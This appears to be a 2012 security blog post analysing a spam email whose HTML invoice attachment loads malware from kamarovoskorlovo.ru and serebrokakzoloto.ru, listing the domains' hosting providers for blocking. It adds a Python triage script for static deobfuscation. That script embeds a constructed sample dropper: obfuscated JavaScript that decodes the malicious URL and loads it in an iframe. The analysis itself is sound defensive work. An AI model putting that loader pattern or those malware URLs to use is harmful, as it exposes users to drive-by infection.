
Friday 10 February 2012

"End of Aug. Statement" spam / kamarovoskorlovo.ru and serebrokakzoloto.ru

Here's yet more spam with a malicious payload:

Date:      Fri, 9 Feb 2012 09:46:12 +0300
From:      BlandTAINA@gmail.com
Subject:      Re: FW: End of Aug. Statement
Attachments:     Invoice_8W20576.htm

as reqeusted I give you inovices issued to you per february (Internet Explorer format).

"Invoice_8W20576.htm" is an HTML attachment containing obfuscated JavaScript that, once decoded, loads kamarovoskorlovo.ru:8080/images/aublbzdni.php. That page in turn attempts to download further malicious components from the same domain and from serebrokakzoloto.ru:8080/images/jw.php?i=8 (note the non-standard port 8080 on both). Wepawet reports for both URLs were linked from the original post.
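The attachment described above is a typical "obfuscated script that unpacks a URL on a :8080 port" dropper. The following Python script is an added triage example, not code from the original post and not the real Invoice_8W20576.htm: it pulls the script blocks out of an HTML attachment, undoes the two most common cheap obfuscations (unescape("%XX...") and String.fromCharCode(...)), and reports the obfuscation markers and any URLs or host:port pairs that fall out. The sample attachment embedded in it is constructed for the demonstration and only reuses the kamarovoskorlovo.ru URL quoted in the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample modelled on the post's description; it is NOT the real
# Invoice_8W20576.htm, only a stand-in that uses the same first-stage URL.
SAMPLE_HTM = """<html><body><h1>Please wait...</h1>
<script>
var u = unescape("%68%74%74%70%3A%2F%2Fkamarovoskorlovo.ru%3A8080%2Fimages%2Faublbzdni.php");
var f = document.createElement("iframe"); f.src = u; document.body.appendChild(f);
eval(String.fromCharCode(118,97,114,32,120,61,49,59));
</script>
</body></html>"""

# Common cheap obfuscation primitives seen in HTML-attachment droppers.
MARKERS = {
    "eval": "eval(",
    "unescape": "unescape(",
    "fromCharCode": "String.fromCharCode",
    "document.write": "document.write",
}
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""")
# Absolute http(s) URLs or scheme-less host[:port]/path strings such as
# serebrokakzoloto.ru:8080/images/jw.php?i=8.
URL_RE = re.compile(
    r"""(?:https?://)?[a-z0-9-]+(?:\.[a-z0-9-]+)+(?::\d{2,5})?/[^\s"'<>()]*""", re.I)


class _ScriptCollector(HTMLParser):
    """Collects the text content of every <script> element."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def extract_scripts(html):
    p = _ScriptCollector()
    p.feed(html)
    return p.scripts


def deobfuscate(js, max_rounds=5):
    """Statically unpack nested unescape()/fromCharCode() layers (heuristic,
    no JS engine: only %XX escapes and literal char-code lists are handled)."""
    for _ in range(max_rounds):
        new = FROMCHARCODE.sub(
            lambda m: '"' + "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()) + '"',
            js)
        new = UNESCAPE_CALL.sub(lambda m: '"' + unquote(m.group(2)) + '"', new)
        if new == js:
            break
        js = new
    return js


def obfuscation_markers(js):
    return sorted(name for name, needle in MARKERS.items() if needle in js)


def extract_urls(text):
    seen = []
    for m in URL_RE.finditer(text):
        if m.group(0) not in seen:
            seen.append(m.group(0))
    return seen


def triage(html):
    """Return a dict summarising scripts, obfuscation markers and network IOCs."""
    markers, urls = set(), []
    scripts = extract_scripts(html)
    for js in scripts:
        markers.update(obfuscation_markers(js))
        for u in extract_urls(deobfuscate(js)):
            if u not in urls:
                urls.append(u)
    hosts = [urlparse(u if "://" in u else "http://" + u).netloc for u in urls]
    return {
        "scripts": len(scripts),
        "markers": sorted(markers),
        "urls": urls,
        "hosts": hosts,
        # Obfuscated script that produces a URL is the signature of this dropper family.
        "suspicious": bool(markers) and bool(urls),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_HTM))
```

The decoder is deliberately static: it never evaluates the script, so a sample that builds its URL through arithmetic or string splitting will still show the markers but not the URL, which is the cue to hand it to a sandbox such as Wepawet.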

kamarovoskorlovo.ru and serebrokakzoloto.ru are multihomed across 25 servers (a raw list can be found at the end of the post). You'll notice that Slicehost figures prominently, accounting for 7 of them. The hosting providers, in the order of the raw list, are:

OVH Systems, France
Amazon Data Services, Ireland
Steadfast Networks, US
Slicehost, US
Slicehost, US
Comcast Business Communications, US
Colopronto, US
iPower, US
MVN Systems Ltd, Bulgaria
Neterra Ltd, Bulgaria
Free SAS / ProXad, France
SiliconTower, Spain
Hosting Services Inc, US
Web24 Pty Ltd, Australia
GoDaddy, US
Slicehost, US
Linode, US
ThePlanet, US
Slicehost, US
Slicehost, US
Slicehost, US
G2KHosting, Argentina
Century Telecom Ltda, Brazil
Jaidee Daijai, US
Slicehost, US

Blocking access to those IPs will also prevent any other malicious sites hosted on the same servers from causing problems. Underneath is a raw list that you can copy and paste.
